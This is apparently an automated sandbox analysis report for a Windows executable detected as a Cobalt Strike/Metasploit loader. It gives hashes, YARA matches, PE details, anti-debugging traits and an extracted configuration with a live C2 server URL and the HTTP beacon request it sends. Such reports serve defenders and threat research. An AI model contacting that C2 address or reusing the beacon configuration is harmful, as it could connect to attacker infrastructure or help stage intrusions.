Windows Analysis Report
SecuriteInfo.com.FileRepMalware.23518.16980.exe

Overview

General Information

Sample name: SecuriteInfo.com.FileRepMalware.23518.16980.exe
Analysis ID: 1521532
MD5: ea94a1fe3c2921313e7ea2b77675c7db
SHA1: dd0388d8bdfd510256f26a8e9efe025fd9381867
SHA256: ecbbb2801bb4d27db737c96ac45b2a51b449ddd9e2e2af42c1e85b79caa5a5ab
Tags: exe

Detection

CobaltStrike, Metasploit
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected CobaltStrike
Yara detected Metasploit Payload
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Potentially malicious time measurement code found
Uses known network protocols on non-standard ports
Contains functionality for execution timing, often used to detect debuggers
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
PE file contains more sections than normal
PE file contains sections with non-standard names
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Name: Cobalt Strike, CobaltStrike
Description: Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit. The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
Attribution:
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike

AV Detection

Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe Avira: detected
Source: 00000000.00000002.1518956360.0000029C510F0000.00000040.00001000.00020000.00000000.sdmp Malware Configuration Extractor: CobaltStrike {"C2Server": "http://106.14.141.209:8087/hkDF", "User Agent": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)\r\n"}
Source: 00000000.00000002.1518956360.0000029C510F0000.00000040.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Metasploit {"Headers": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)\r\n", "Type": "Metasploit Download", "URL": "http://106.14.141.209/hkDF"}
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe ReversingLabs: Detection: 70%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 96.7% probability
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe Joe Sandbox ML: detected
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 4x nop then sub rbx, qword ptr [rax+18h] 0_2_0069D240
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 4x nop then mov r8, 0000800000000000h 0_2_006A6B60

Networking

Source: Malware configuration extractor URLs: http://106.14.141.209:8087/hkDF
Source: Malware configuration extractor URLs: http://106.14.141.209/hkDF
Source: unknown Network traffic detected: HTTP traffic on port 49701 -> 8087
Source: global traffic TCP traffic: 192.168.2.10:49701 -> 106.14.141.209:8087
Source: Joe Sandbox View ASN Name: CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd
Source: unknown DNS traffic detected: query: 18.31.95.13.in-addr.arpa reply code: Name error (3)
Source: global traffic HTTP traffic detected:
  GET /hkDF HTTP/1.1
  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
  Host: 106.14.141.209:8087
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 106.14.141.209
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe, 00000000.00000002.1518227006.0000029C2A49C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23518.16980.exe, 00000000.00000002.1518227006.0000029C2A4F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://106.14.141.209:8087/hkDF
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe, 00000000.00000002.1518227006.0000029C2A4F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://106.14.141.209:8087/hkDF&
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe, 00000000.00000002.1518227006.0000029C2A4F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://106.14.141.209:8087/hkDFN
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe, 00000000.00000002.1518227006.0000029C2A49C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://106.14.141.209:8087/hkDFly
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe Binary or memory string: github.com/lxn/win.registerRawInputDevices

System Summary

Source: 00000000.00000002.1518956360.0000029C510F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 00000000.00000002.1518956360.0000029C510F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 00000000.00000002.1517779379.000000C000110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 00000000.00000002.1517779379.000000C000110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 0_2_006C8060 0_2_006C8060
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 0_2_00685040 0_2_00685040
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 0_2_0069D440 0_2_0069D440
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 0_2_0068B020 0_2_0068B020
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 0_2_006A7000 0_2_006A7000
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 0_2_006B70E0 0_2_006B70E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 0_2_006854A0 0_2_006854A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 0_2_0069A9A0 0_2_0069A9A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 0_2_00688D80 0_2_00688D80
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 0_2_00694260 0_2_00694260
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 0_2_0069EA60 0_2_0069EA60
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 0_2_0068BA40 0_2_0068BA40
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 0_2_0068C640 0_2_0068C640
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 0_2_006A42E0 0_2_006A42E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 0_2_00684AC7 0_2_00684AC7
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 0_2_0069E2A0 0_2_0069E2A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 0_2_006A6B60 0_2_006A6B60
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 0_2_00693705 0_2_00693705
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: String function: 006B2D80 appears 173 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: String function: 006B4E20 appears 186 times
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe Static PE information: Number of sections : 13 > 10
Source: 00000000.00000002.1518956360.0000029C510F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 00000000.00000002.1518956360.0000029C510F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 00000000.00000002.1517779379.000000C000110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 00000000.00000002.1517779379.000000C000110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe Static PE information: Section: /19 ZLIB complexity 0.9934974272088354
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe Static PE information: Section: /32 ZLIB complexity 0.9958333333333333
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe Static PE information: Section: /65 ZLIB complexity 0.9972217085798817
Source: classification engine Classification label: mal100.troj.evad.winEXE@2/1@1/1
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7880:120:WilError_03
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe File opened: C:\Windows\system32\999e755d965c3dfa7a285ddb818297cd4da7f6037d10a9b7a28f683b480e87bfAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Jump to behavior
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe ReversingLabs: Detection: 70%
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 Jump to behavior
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe Static file information: File size 2407936 > 1048576
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe Static PE information: section name: /4
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe Static PE information: section name: /19
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe Static PE information: section name: /32
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe Static PE information: section name: /46
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe Static PE information: section name: /65
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe Static PE information: section name: /78
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe Static PE information: section name: /90
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe Static PE information: section name: .symtab
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 0_2_0000029C510F0128 push eax; ret 0_2_0000029C510F0364
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 0_2_0000029C510F02FD push eax; ret 0_2_0000029C510F0364

Hooking and other Techniques for Hiding and Protection

Source: unknown Network traffic detected: HTTP traffic on port 49701 -> 8087
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 0_2_006DB920 rdtscp 0_2_006DB920
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe, 00000000.00000002.1518227006.0000029C2A514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe, 00000000.00000002.1518227006.0000029C2A514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW,
Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe, 00000000.00000002.1518227006.0000029C2A49C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@

Anti Debugging

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 0_2_006DB920 Start: 006DB929 End: 006DB93F 0_2_006DB920
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe Code function: 0_2_006DB920 rdtscp 0_2_006DB920

Remote Access Functionality

Source: Yara match File source: 00000000.00000002.1518956360.0000029C510F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1517779379.000000C000110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY